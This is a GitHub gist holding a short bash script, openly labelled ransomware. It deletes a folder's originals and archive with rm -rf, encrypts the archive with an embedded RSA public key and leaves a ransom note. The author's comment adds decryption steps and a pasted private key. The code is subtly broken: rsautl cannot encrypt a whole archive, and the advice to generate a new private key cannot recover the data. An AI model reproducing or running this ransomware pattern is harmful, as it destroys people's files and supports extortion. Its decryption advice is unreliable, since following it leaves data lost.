Skip to content

Instantly share code, notes, and snippets.

@uzair004

uzair004/ransomewareScript.sh

Last active June 13, 2022 14:23
Show Gist options
  • Save uzair004/ccb3bca85ed469a0ae82463a2a557e91 to your computer and use it in GitHub Desktop.
Save uzair004/ccb3bca85ed469a0ae82463a2a557e91 to your computer and use it in GitHub Desktop.
Download ZIP
Bash Ransomeware Script
Raw
ransomewareScript.sh
cd /Users/<YourPCUserGoesHere>/Downloads
echo "-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArtg7hyD6v1o/THawDHld
PXoJ94bWqNmJ2c1C0VCE12XvjW4DhqVovsCwUsK+ESs9EV+XQ4iSoitg8XVohJUO
IA7VxvtzkcnJNZZBhm/jGrI3HS90OVINg/L+TckjtN5pMo/76D9TCxPfdAPXcT9f
p9BlGRBQnWEKPVFY+ZMp48yH2rhWpPjgst/Enj9cDPZ8RX1CRyzYzpREpkJSjbpM
wHKsQTeyauBouU3b1UZHhWirp+iS/aUwUJwOAild2rxho0Njx19Kwib/yvhLH6La
6RhZwVkNYzeUEHm92edORAjmb/uNAeI5wzYRF73OaNseBY1rL7K8mdcoSGcCalLK
YwIDAQAB
-----END PUBLIC KEY-----" > key.pem
tar -czf folder-to-encrypt.tar.gz folder-to-encrypt
rm -rf folder-to-encrypt
openssl rsautl -encrypt -inkey key.pem -pubin -in folder-to-encrypt.tar.gz -out folder-to-encrypt.enc
rm -rf folder-to-encrypt.tar.gz
echo "You've been hacked! Gimme all the moneyz" > note.txt
@uzair004
Copy link
Author

uzair004 commented Jun 13, 2022
edited
Loading

If you have encrypted your folder using the above script, here is how to decrypt it.

Create a Private key
in above script we have a public key inserted, to create its private counter-part, which is used to decrypt the folder. (public key is used to encrypt the folder)

  1. openssl genrsa -aes256 -out private.pem
  2. It will ask for pass phrase, enter nodejs-ransomeware.
  3. Enter this command openssl rsautl -decrypt -inkey private.pem -in /Users/<your-username>/Desktop/folder-to-encrypt.enc > /Users/<your-username>/Desktop/folder-to-encrypt.tar.gz

You should be able to access your folder now, decompress that folder & good to go.

OR

or you can skip the first two-step by,
create a file private.pem
paste all these details

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,ED5C3502C7EC85A683E18C6EDEF75AF8

xYKirwjGqAIepdz1kYSrxSZu3R2/GWjDt/qTqOfweksWYhs2XhSxtG94w1+vyS+d
1ihYoocBHWCCg+caYJ2e1HXU6k1YsX04K7DnL/5Z5u+b7hmYOK1iLG4M4u8osHmz
mU2uRejsH3a+Cw6faISBNDWTOgSDCsVzTdYc5tn4n6GOplQAZnnfHyjXLOy8wvdQ
jwJ4Syo+WF1ArP5OdUXBnncbBAlY7x4dmZblUCHCMT2hfNoX9PdJ4klteqo+CR14
QhZH0q/2G8MKtuVvo6g1nsbOzLyLp6a9Lz9GV1vK4jjQmBpljmzJ8IArfjWztELX
xODGrJWflSF+Len0wnaR2tqlLXJs1BVDH9OChFq7FJZMhvDfPdOi8Y6VVKgINdTS
kqdT5jW+H2e4tH3MmQmHM7XqT+Q/NC1eP6Jh5uQhXcVikWWMpx+6ACXEWzD0mk7e
KHjWJ+E3kln3EMdXKS0k8QQTt79dMsY9sO+wJW5mAhfN2izRLbRNPq5H8mPG6sqb
HgSwZKeIXHeK4nMaYNBKPLn9ESSV01VbDdxP3bAi0x1IForM23VnhRXJItaxaSqt
nEOrfp7SHXAlyMrYaNsW3OrWLcnQaKA668KS75q+Jc6bUzhjpVwddM3pEOrtZc7q
RxhAEIZfy7oXBqIK/thNV9eGDvIziaGKwLk6Q+g8H1gwmG7eUHIzptfy4UqHQzsM
4SQX/2apfgMbfCCguXMhiu270i4YvoOsJbSRTsjDcDijLdWe8vSsKpnHJEVkCE8E
VFmmdLHUNtRsr0HH9v6cKGC5Ydz6mpE1fkT7nRDliLt0dbwbwVBgqVG1Iz/0GDcB
cpRNOHES4ahnq4CYvjTQW8RDOFsHeGTckj18EFAzEP1liNRtbtpaMHW71wjizSqz
7f/Q7AsFhA18ObX5fN67DUv0tM4NkIDbnwDrmfA+khz4lRIn1ibdzSGKJDnV+ctc
POkxR2cU19TPfdrFbH+zpYqhoB1bSTyhCh0xEw8sNjMHyyxC0wB9niB6ZK+ar59H
DE3UjmjfuZBIpKhDqiPH8fRQclVDKD41t0RawNrIvNPRh5tbtM7KyH6v8mnR9aYO
upvjjhAAlk2BoMSN6QGrmExz+As9ZuXYMG52Z1FRDKD1XkAe0QwX5KlH612Ujmkw
h3dzUYxcCrRd6/YrWMOYgf6dSmFUJgDi2M8TYtBb2FfMlito0adT2SBcX/bGUqQ1
LZGwUzACucHDZbgsFD5FNBVXrr27xDVn3Yz2Kf4pUjh1B7HYiktDa10ne48JvU8O
dHGK3NEcKAn2PaNBq/+wFiSURZisg8byjTvcy++XptRqZ9b54xw3k9nzqRDVWj6i
HHFS/F1e7PKZudt+XISuIWDSL2UliFrIvgZNSTAk+M1r/KbSq62QdAey31V2lHh9
iEVQDfwgqVFpgyu/Uc4esDsi9t3zL8tkaZsbqkW3u528VJNG0KR09Ea91V4t4EWm
8uiXAYcwTUyuoAQnDidke9k8XpTZG8SzWUrR+wqaGojdvRBStxijMB5ZS0uCBWjb
Bol5x2bddYcpgwkUMwFry0koodQcaWHwGxGoAXmok+vKTxQQJa2qHUseh42ASkAJ
-----END RSA PRIVATE KEY-----

save file & run command in step 3

@uzair004
Copy link
Author

path of folder should be updated first, you can get this gist & replace path with a dummy folder in your system. i.e create a folder-to-encrypt in downloads folder & make sure enter your PC name in above script

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment